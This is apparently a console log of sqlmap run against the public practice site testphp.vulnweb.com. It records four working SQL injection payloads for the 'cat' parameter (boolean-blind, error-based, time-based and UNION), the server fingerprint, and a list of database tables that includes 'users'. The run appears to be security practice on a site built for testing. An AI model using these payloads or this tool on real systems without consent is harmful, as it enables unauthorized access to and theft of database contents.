Tables found at 'http://testphp.vulnweb.com/listproducts.php?cat=1':
1.        __H__
2.  ___ ___[)]_____ ___ ___  {1.6.4#stable}
3. |_ -| . [)]     | .'| . |
4. |___|_  [']_|_|_|__,|  _|
5.       |_|V...       |_|   https://sqlmap.org
6. 
7. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
8. 
9. [*] starting @ 02:05:14 /2024-01-08/
10. 
11. [02:05:14] [INFO] resuming back-end DBMS 'mysql' 
12. [02:05:14] [INFO] testing connection to the target URL
13. sqlmap resumed the following injection point(s) from stored session:
14. ---
15. Parameter: cat (GET)
16.     Type: boolean-based blind
17.     Title: AND boolean-based blind - WHERE or HAVING clause
18.     Payload: cat=1 AND 3536=3536
19. 
20.     Type: error-based
21.     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
22.     Payload: cat=1 AND GTID_SUBSET(CONCAT(0x7178767a71,(SELECT (ELT(1272=1272,1))),0x7176716a71),1272)
23. 
24.     Type: time-based blind
25.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
26.     Payload: cat=1 AND (SELECT 8294 FROM (SELECT(SLEEP(5)))bIqA)
27. 
28.     Type: UNION query
29.     Title: Generic UNION query (NULL) - 11 columns
30.     Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178767a71,0x5348566f69545647724e5356416c684177594d76746f6653797744477672476f6f725a6462757a72,0x7176716a71),NULL-- -
31. ---
32. [02:05:16] [INFO] the back-end DBMS is MySQL
33. web server operating system: Linux Ubuntu
34. web application technology: PHP 5.6.40, Nginx 1.19.0
35. back-end DBMS: MySQL 8
36. [02:05:16] [INFO] fetching database names
37. [02:05:16] [INFO] fetching tables for databases: 'acuart, information_schema'
38. Database: acuart
39. [8 tables]
40. +---------------------------------------+
41. | artists                               |
42. | carts                                 |
43. | categ                                 |
44. | featured                              |
45. | guestbook                             |
46. | pictures                              |
47. | products                              |
48. | users                                 |
49. +---------------------------------------+
50. 
51. Database: information_schema
52. [79 tables]
53. +---------------------------------------+
54. | ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
55. | APPLICABLE_ROLES                      |
56. | CHARACTER_SETS                        |
57. | CHECK_CONSTRAINTS                     |
58. | COLLATIONS                            |
59. | COLLATION_CHARACTER_SET_APPLICABILITY |
60. | COLUMNS                               |
61. | COLUMNS_EXTENSIONS                    |
62. | COLUMN_PRIVILEGES                     |
63. | COLUMN_STATISTICS                     |
64. | ENABLED_ROLES                         |
65. | ENGINES                               |
66. | EVENTS                                |
67. | FILES                                 |
68. | INNODB_BUFFER_PAGE                    |
69. | INNODB_BUFFER_PAGE_LRU                |
70. | INNODB_BUFFER_POOL_STATS              |
71. | INNODB_CACHED_INDEXES                 |
72. | INNODB_CMP                            |
73. | INNODB_CMPMEM                         |
74. | INNODB_CMPMEM_RESET                   |
75. | INNODB_CMP_PER_INDEX                  |
76. | INNODB_CMP_PER_INDEX_RESET            |
77. | INNODB_CMP_RESET                      |
78. | INNODB_COLUMNS                        |
79. | INNODB_DATAFILES                      |
80. | INNODB_FIELDS                         |
81. | INNODB_FOREIGN                        |
82. | INNODB_FOREIGN_COLS                   |
83. | INNODB_FT_BEING_DELETED               |
84. | INNODB_FT_CONFIG                      |
85. | INNODB_FT_DEFAULT_STOPWORD            |
86. | INNODB_FT_DELETED                     |
87. | INNODB_FT_INDEX_CACHE                 |
88. | INNODB_FT_INDEX_TABLE                 |
89. | INNODB_INDEXES                        |
90. | INNODB_METRICS                        |
91. | INNODB_SESSION_TEMP_TABLESPACES       |
92. | INNODB_TABLES                         |
93. | INNODB_TABLESPACES                    |
94. | INNODB_TABLESPACES_BRIEF              |
95. | INNODB_TABLESTATS                     |
96. | INNODB_TEMP_TABLE_INFO                |
97. | INNODB_TRX                            |
98. | INNODB_VIRTUAL                        |
99. | KEYWORDS                              |
100. | KEY_COLUMN_USAGE                      |
101. | OPTIMIZER_TRACE                       |
102. | PARAMETERS                            |
103. | PARTITIONS                            |
104. | PLUGINS                               |
105. | PROCESSLIST                           |
106. | PROFILING                             |
107. | REFERENTIAL_CONSTRAINTS               |
108. | RESOURCE_GROUPS                       |
109. | ROLE_COLUMN_GRANTS                    |
110. | ROLE_ROUTINE_GRANTS                   |
111. | ROLE_TABLE_GRANTS                     |
112. | ROUTINES                              |
113. | SCHEMATA                              |
114. | SCHEMATA_EXTENSIONS                   |
115. | SCHEMA_PRIVILEGES                     |
116. | STATISTICS                            |
117. | ST_GEOMETRY_COLUMNS                   |
118. | ST_SPATIAL_REFERENCE_SYSTEMS          |
119. | ST_UNITS_OF_MEASURE                   |
120. | TABLES                                |
121. | TABLESPACES                           |
122. | TABLESPACES_EXTENSIONS                |
123. | TABLES_EXTENSIONS                     |
124. | TABLE_CONSTRAINTS                     |
125. | TABLE_CONSTRAINTS_EXTENSIONS          |
126. | TABLE_PRIVILEGES                      |
127. | TRIGGERS                              |
128. | USER_ATTRIBUTES                       |
129. | USER_PRIVILEGES                       |
130. | VIEWS                                 |
131. | VIEW_ROUTINE_USAGE                    |
132. | VIEW_TABLE_USAGE                      |
133. +---------------------------------------+
134. 
135. [02:05:18] [INFO] fetched data logged to text files under '/home/moeen/.local/share/sqlmap/output/testphp.vulnweb.com'
136. [02:05:18] [WARNING] your sqlmap version is outdated
137. 
138. [*] ending @ 02:05:18 /2024-01-08/
